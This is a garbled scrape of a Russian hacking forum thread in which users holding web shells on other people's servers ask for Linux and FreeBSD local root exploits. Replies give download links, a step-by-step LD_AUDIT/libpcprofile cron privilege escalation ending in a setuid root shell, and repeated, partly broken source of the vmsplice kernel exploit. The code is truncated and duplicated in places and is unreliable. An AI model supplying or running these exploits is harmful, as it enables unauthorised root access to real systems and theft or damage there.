131202 lrwxrwxrwx 1 root root 16 Dec 17 2007 /lib/libpcre.so.0 -> libpcre.so.0.0.1
133814 -rwxr-xr-x 1 root root 65560 Nov 29 2007 /lib/libpcre.so.0.0.1
131074 -rwxr-xr-x 1 root root 112212 Feb 18 02:45 /lib/ld-2.3.4.so
132966 lrwxrwxrwx 1 root root 11 Mar 3 01:22 /lib/ld-linux.so.2 -> ld-2.3.4.so
132951 lrwxrwxrwx 1 root root 13 Jul 28 2007 /lib/ld-lsb.so.3 -> ld-linux.so.2
$ ls -lia /boot;ls -lia /lib/libpc* 2>&1;ls -lia /lib/ld* 2>&1;
total 26948
3637249 drwxr-xr-x 3 root root 4096 Apr 8 2009 .
2 drwxr-xr-x 24 root root 4096 Apr 8 2009 ..
3637250 -rw-r--r-- 1 root root 723178 Feb 11 2008 System.map-2.6.18-6-686
3637268 -rw-r--r-- 1 root root 928033 Mar 14 2009 System.map-2.6.26-1-686
3637251 -rw-r--r-- 1 root root 70682 Feb 11 2008 config-2.6.18-6-686
3637269 -rw-r--r-- 1 root root 91640 Mar 14 2009 config-2.6.26-1-686
3637254 drwxr-xr-x 2 root root 4096 Apr 8 2009 grub
3637267 -rw-r--r-- 1 root root 5259149 Apr 8 2009 initrd.img-2.6.18-6-686
3637266 -rw-r--r-- 1 root root 5259970 Apr 8 2009 initrd.img-2.6.18-6-686.bak
3637272 -rw-r--r-- 1 root root 6194894 Apr 8 2009 initrd.img-2.6.26-1-686
3637270 -rw-r--r-- 1 root root 6194909 Apr 8 2009 initrd.img-2.6.26-1-686.bak
3637252 -rw-r--r-- 1 root root 1260861 Feb 11 2008 vmlinuz-2.6.18-6-686
3637253 -rw-r--r-- 1 root root 1506512 Mar 14 2009 vmlinuz-2.6.26-1-686
12697846 -rw-r--r-- 1 root root 5440 Jan 4 2009 /lib/libpcprofile.so
12697768 -rwxr-xr-x 1 root root 113248 Jan 4 2009 /lib/ld-2.7.so
12697649 lrwxrwxrwx 1 root root 9 Apr 8 2009 /lib/ld-linux.so.2 -> ld-2.7.so
Скачай архив:
http://files.webi.ru/m_down/r00t.rar.html
файл с архива r00t.sh закачай на сервер и выполни следующие команды:
1. chmod +x r00t.sh
2. ./r00t.sh
3. whoami
в ответ получишь:
root
total 55852
2 drwxr-xr-x 4 root root 8192 Mar 3 06:11 .
2 drwxr-xr-x 27 root root 4096 Jun 8 01:19 ..
6036 -rw-r--r-- 1 root root 770652 Feb 18 08:41 System.map-2.6.9-100.EL
14 -rw-r--r-- 1 root root 749462 Aug 12 2006 System.map-2.6.9-42.EL
18 -rw-r--r-- 1 root root 754505 Jun 26 2007 System.map-2.6.9-55.0.2.EL
6031 -rw-r--r-- 1 root root 754717 Sep 28 2007 System.map-2.6.9-55.0.9.EL
132966 lrwxrwxrwx 1 root root 11 Mar 3 01:22 /lib/ld-linux.so.2 -> ld-2.3.4.so
132951 lrwxrwxrwx 1 root root 13 Jul 28 2007 /lib/ld-lsb.so.3 -> ld-linux.so.2
не пробить
sh-3.2$ ./r00t.sh
./r00t.sh: line 30: gcc: command not found
./r00t.sh: line 42: gcc: command not found
./r00t.sh: line 43: gcc: command not found
./r00t.sh: line 48: ./sh: No such file or directory
Вот что получаю в ответ.
sh-3.2$ ./r00t.sh
./r00t.sh: line 30: gcc: command not found
./r00t.sh: line 42: gcc: command not found
./r00t.sh: line 43: gcc: command not found
./r00t.sh: line 48: ./sh: No such file or directory
Вот что получаю в ответ.
на сервере нет gcc...он скомпилировать сплойт не может
Вот вариант, в котором gcc не нужен:
Убираем маску прав доступ а для создаваемых файлов( ри umask 0 файлы будут созд ваться по умолчанию с пр вами"-rw-rw-rw-")
$umask 0
Для атаки будем использов ать стандартную библиотек у профилирования libpcprofile,в одящую в комплект libc:
$dpkg-S/lib/libpcprofile.so
libc6: /lib/libpcprofile.so
$ls-l/lib/libpcprofile.so
-rw-r--r--1 root root 5496 2010-10-12 03:32/lib/libpcprofile.so
Код инициализации libpcprofile не проверяет различия эфф ективного и текущего иден тификатора пользователя,н при этом позволяет созд ть лог-файл,который можно создат в любой системной дирек ории:
$LD_AUDIT="libpcprofile.so"PCPROFILE_OUTPUT="/etc/cron.d/exploit"ping
ERROR:ld.so:object'libpcprofile.so'cannot b e loadedasauditinterface:undefined symbol:la_ver sion;ignored.
Несмотря на вывод ошибки, роцедура инициализации в полнилась и в директории/etc/cron.d был создан лог-файл:
$ls-l/etc/cron.d/exploit
-rw-rw-rw-1 root taviso 65 2010-10-21 14:22/etc/cron.d/exploit
Как видно,права доступа н созданный файл,позволяют любому пользователю запи сать в него любые данные, оторые затем будут выпол ены системой cron от польз вателя root.Например:
$printf"* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n"> /etc/cron.d/exploit
Через пару минут наблюдае м:
$ls-l/tmp/exploit
ls:cannot access/tmp/exploit:No such fileordirectory
...
$ls-l/tmp/exploit
-rwsr-xr-x 1 root root 83888 2010-10-21 14:25/tmp/exploit
$ /tmp/exploit
# whoami
root
Если команда dpkg поддерживается то порутаешь...
2.6.18-53.1.19.el5.028stab053.14 #1 SMP Thu May 8 16:29:13 MSD 2008 i686 i686 i386 GNU/Linux
Чем можно порутать? sendpage не прокатил.
Чем можно порутать? sendpage не прокатил.
какой из ? их 3 как бы...все пробовал ?
есть вопрос:
ставлю эксплоит Kallsyms
выдает
sh: no job control in this shell
sh-3.2# exit
[32mAc1dB1tCh3z [0mVS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-128.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff8030d360
$$$ dummy_security_ops->ffffffff80496c00
$$$ capability_ops->ffffffff8030ec20
$$$ selinux_enforcing->ffffffff80499960
$$$ audit_enabled->ffffffff80485124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 ppPpPPpPPPpP
вроде как прокатил
проверяю
id,whoami
пишет command not found
ядро старое
2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64
че за ерунда не пойму?
есть вопрос:
ставлю эксплоит
Kallsyms
выдает
sh: no job control in this shell
sh-3.2# exit
[32mAc1dB1tCh3z [0mVS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-128.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff8030d360
$$$ dummy_security_ops->ffffffff80496c00
$$$ capability_ops->ffffffff8030ec20
$$$ selinux_enforcing->ffffffff80499960
$$$ audit_enabled->ffffffff80485124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 ppPpPPpPPPpP
вроде как прокатил
проверяю
id,whoami
пишет
command not found
ядро старое
2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64
че за ерунда не пойму?
не знаю, не встречалось....возможно баш слетает...
вот попробуй этот:
http://turboupload.com/ndbm663kbwft
в архиве 2 скомпиленых сплойта....на каждый используй: chmod +x name_file
и запусти.
не знаю, не встречалось....возможно баш слетает...
вот попробуй этот:
http://turboupload.com/ndbm663kbwft
в архиве 2 скомпиленых сплойта....на каждый используй: chmod +x name_file
и запусти.
Спасибо.
самое интенерсное в том что именно не все команды (открытие портов и т.д все ок) а важные
id, и т.д не выполняются) весь google пререрыл но так и не понятно. если хочешь в личку кину попробуй.
Добавлю
gcc,locale bind-back connect и все такое не катит.
Вот как тут быть е...ть.
есть под это?
Linux be2 2.6.32-5-amd64 #1 SMP Wed Nov 24 12:32:24 UTC 2010 x86_64 GNU/Linux
Спасибо.
самое интенерсное в том что именно не все команды (открытие портов и т.д все ок) а важные
id, и т.д не выполняются) весь google пререрыл но так и не понятно. если хочешь в личку кину попробуй.
Добавлю
gcc,locale bind-back connect и все такое не катит.
Вот как тут быть е...ть.
Ну давай попробую, если что получится - отпишусь!
есть под это?
а что пробовал ?
асидбичес, роберт ю сак, фулл нелсон....выбора много...а справятся или нет - уже зависит от системы
Ну давай попробую, если что получится - отпишусь!
а что пробовал ?
асидбичес, роберт ю сак, фулл нелсон....выбора много...а справятся или нет - уже зависит от системы
кааааак??????узнать то???
если не бинд-и т.д команды не выполняються.
пробовал руткит, putty курит......Как?
Сообщение от sevenup
Ну давай попробую, если что получится - отпишусь!
а что пробовал ?
асидбичес, роберт ю сак, фулл нелсон....выбора много...а справятся или нет - уже зависит от системы
кааааак??????узнать то???
если не бинд-и т.д команды не выполняються.
пробовал руткит, putty курит......Как?
Пробовал запуск сплоитов из-под веба? На рдоте есть ман,если не пробывал...
P.S линя можно переписать как угодно, что-то вырезать, а что-то добавить...поэтому могут и не работать многие привычные команды...
Пробовал запуск сплоитов из-под веба? На рдоте есть ман,если не пробывал...
P.S линя можно переписать как угодно, что-то вырезать, а что-то добавить...поэтому могут и не работать многие привычные команды...
по подробнее, ссыль если можно (какие команды . в google искал все не то)
https://rdot.org/forum/showthread.php?t=57
Это про запуск из веба (если думаешь, что отваливается баш)
А переписать команды можно и самому, так как линь это опенсорс) поэтому кроме админа (программера) тебе их никто не назовет)
C-r-A-c-K
07.07.2011, 11:06
Не могу разобраться.
есть шелл Linux xxxxxx 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686
работает баг с dpkg.
cron выполняется с правами root
при выполнении "cp /bin/bash /tmp/exploit; chmod u+s /tmp/exploit"
создает /tmp/exploit, но при запуске /tmp/exploit юзер тот же www-data
как еще можно сделать запускаемую оболочку, в которой выполнялись бы права от root.
вопрос снимается)
сделал просто бинд порта с правами root.
C-r-A-c-K
08.07.2011, 01:01
помогите с Linux 2.6.27.23-201.19-xen #1 SMP 2009-05-26 17:02:05 -0400 x86_64
Ubuntu 10.04.2 LTS
gcc работает
dpkg тоже.
через баг dpkg неудалось поруутать, не создает лог файл в папке cron.d
помогите с Linux 2.6.27.23-201.19-xen #1 SMP 2009-05-26 17:02:05 -0400 x86_64
Ubuntu 10.04.2 LTS
gcc работает
dpkg тоже.
через баг dpkg неудалось поруутать, не создает лог файл в папке cron.d
эм...."баг dpkg" это один из способов использования бага glibs...учитывая версию ядра...то она пробивается обычным способом....смотри сообщение:
348 (https://antichat.live/showpost.php/p/2727082/postcount/348/) этой темы.
C-r-A-c-K
08.07.2011, 02:28
sevenup,
$ cd /tmp
$ chmod +x r00t.sh
$ ./r00t.sh
System does not appear to be vulnerable
$ whoami
www-data
еще варианты имеются?
sevenup,
еще варианты имеются?
асидбичес,роборт ю сак,фулл нельсон
C-r-A-c-K
08.07.2011, 18:14
спасибо, sevenup, приятно общаться)
мне интересно, через yum можно использовать баг как dpkg ?
подскажите будьте так добры.
Linux Fedora_10 2.6.27.5-117.fc10.x86_64 #1 SMP Tue Nov 18 11:58:53 ES
T 2008 x86_64 x86_64 x86_64 GNU/Linux
найду что-нибудь?
спасибо, sevenup, приятно общаться)
мне интересно, через yum можно использовать баг как dpkg ?
подскажите будьте так добры.
Linux Fedora_10 2.6.27.5-117.fc10.x86_64 #1 SMP Tue Nov 18 11:58:53 ES
T 2008 x86_64 x86_64 x86_64 GNU/Linux
найду что-нибудь?
вариант с сообщения 348 (https://antichat.live/showpost.php/p/2727082/postcount/348/) не пробил ?
если нет, попробуйте enlightenment.
C-r-A-c-K
08.07.2011, 19:19
при обращении к .sh пишет perm denied
при компилировании какого либо сплоита из пака выдает errors
/usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t'
интересен баг с libpcprofile.so, он реализуем через yum ?
FreeBSD 6.4-RELEASE-p8 #1 r101746: Mon Aug 30
чем можно порутать? ничего не нашел, мб плохо искал....
FreeBSD 6.4-RELEASE-p8 #1 r101746: Mon Aug 30
чем можно порутать? ничего не нашел, мб плохо искал....
http://www.1337day.com/exploits/15572
и
http://www.1337day.com/exploits/8126
Это единственный сплойты под это ядро.
6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:45:45 UTC 2008
А под это что-то? Ядро вроде старенькое.
6.3-RELEASE FreeBSD 6.3-RELEASE #0: Wed Jan 16 04:45:45 UTC 2008
А под это что-то? Ядро вроде старенькое.
я думаю padlina2 прокатит
BUGAGAlter
13.07.2011, 05:29
Есть что?
Linux srv020 2.6.32-5-686-bigmem #1 SMP Mon Jun 13 05:03:09 UTC 2011 i686
<Cyber-punk>
13.07.2011, 05:58
Есть что?
Linux srv020 2.6.32-5-686-bigmem #1 SMP Mon Jun 13 05:03:09 UTC 2011 i686
http://www.exploit-db.com/exploits/14814/
FreeBSD 8.2-STABLE #0: Wed Jun 22 17:51:47 UTC 2011
Есть что нибудь?
FreeBSD 8.2-STABLE #0: Wed Jun 22 17:51:47 UTC 2011
Есть что нибудь?
Нет.
Linux 2.6.33.7-vs2.3.0.36.30.4 #23 SMP Tue Sep 28 05:47:35 PDT 2010 x86_64
Linux 2.6.18-238.12.1.el5PAE #1 SMP Tue May 31 14:02:45
Linux 2.4 #1 SMP Thu Nov 25 01:59:22 UTC 2010 i686 GNU/Linux
FreeBSD 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Wed Aug 18 19:46:13 EDT
подскажите, плиз
Linux 2.6.33.7
Linux 2.6.18
Linux 2.4 i686 GNU/Linux
FreeBSD 7.3-RELEASE-p2
подскажите, плиз
и что тут подсказать?
показывайте полный вывод команды: uname -a
т.к. играет роль не только ядро но и дата сборки....
winstrool
17.07.2011, 01:52
вот это интиресует:
Linux **** 2.6.18-92.1.22.el5 #1 SMP Tue Dec 16 12:03:43 EST 2008 i686
Expl0ited
17.07.2011, 08:07
вот это интиресует:
Linux **** 2.6.18-92.1.22.el5 #1 SMP Tue Dec 16 12:03:43 EST 2008 i686
Для ядер 2.6.х даты сборки до июля 2009 идеально подходит сборка enlightenment:
http://www.grsecurity.net/~spender/enlightenment.tgz
Linux 2.6.33.7-vs2.3.0.36.30.4 #23 SMP Tue Sep 28 05:47:35 PDT 2010 x86_64
Linux 2.6.18-238.12.1.el5PAE #1 SMP Tue May 31 14:02:45
Linux 2.4 #1 SMP Thu Nov 25 01:59:22 UTC 2010 i686 GNU/Linux
FreeBSD 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Wed Aug 18 19:46:13 EDT
подскажите, плиз
мм?
2.6.18 exploit
может кто подскажет почему ощибку дает:
2 сплоита
один на паблик выложен но умышленно не доделан:
[CODE]
/*
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i flags = 1 private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
vasykas, вот исправленный код первого сплойта с твоего сообщения:
[CODE]
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
#define PAGE_SIZE getpagesize()
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i flags = 1 private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE)
[QUOTE="sevenup"]
vasykas, вот исправленный код первого сплойта с твоего сообщения:
[CODE]
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
#define PAGE_SIZE getpagesize()
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
